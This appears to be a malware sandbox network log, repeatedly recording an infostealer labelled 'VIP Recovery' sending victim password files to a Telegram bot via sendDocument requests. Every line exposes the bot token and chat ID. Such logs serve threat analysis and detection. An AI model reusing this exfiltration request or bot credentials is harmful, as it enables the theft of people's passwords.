                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcd9999c7f3372Host: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcd9aa313f3835Host: api.telegram.orgContent-Length: 560
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcd9bb28caf6f0Host: api.telegram.orgContent-Length: 560
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcd9c6eb4b45c9Host: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcd9d920235f7aHost: api.telegram.orgContent-Length: 560
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcd9daf8508ec0Host: api.telegram.orgContent-Length: 560
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcd9f34a734345Host: api.telegram.orgContent-Length: 560
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcd9f129bc3f60Host: api.telegram.orgContent-Length: 560
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcda0e47642328Host: api.telegram.orgContent-Length: 560
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcda09bce7e3eeHost: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcda2a11e28f03Host: api.telegram.orgContent-Length: 560
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcda2b6f5946f9Host: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcda7b752d16fcHost: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcda4f67f6f17fHost: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcdab15e90aa9cHost: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcda7d977e6e0cHost: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcdaf9aed13a59Host: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcdab98bdf9072Host: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcdb6b0f853274Host: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcdb0945efe091Host: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcdbdd55c06625Host: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcdc508e6a9ef6Host: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcdb737b693935Host: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcdee3d2d3270dHost: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcdc15e6f642c6Host: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcde35e0cc7c14Host: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dce1e59cb38a86Host: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dce2c4fd9d50bbHost: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcdf23b64c0193Host: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dce3488763ca5dHost: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcdf9ea2613703Host: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dce1f6e390835fHost: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dce3d56841fb19Host: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dce27d7cd6f4d1Host: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dce4554f19dcc3Host: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dce309cdaf4648Host: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dce690e0867cd4Host: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dce72aa89fc853Host: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dce39b9b85919cHost: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dce7aa69158b0eHost: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dce43bdbce8cfeHost: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dce833a5cad7e1Host: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dce4fe8cefc2baHost: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dce8b65a0f3d9fHost: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dce64c0780910eHost: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dceaff00abf50cHost: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dceba7d0803f2eHost: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dce6e7f102d275Host: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dceaac99e5fcbfHost: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcef90c1a97496Host: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dceb3e4c93a34eHost: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf048596588d7Host: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dced6e233a01b3Host: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf0ced33ec182Host: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcefb4e2f4aa1cHost: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf15ba97e3e5dHost: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf03acab5cb25Host: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf2cc95a004baHost: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf0c0ffc60fd2Host: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf2d6cd89f323Host: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf5228736b7e4Host: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf5262a282ce3Host: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf5efb3c6be30Host: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf5adc4041a3cHost: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf68d694733ebHost: api.telegram.orgContent-Length: 560Connection: Keep-Alive
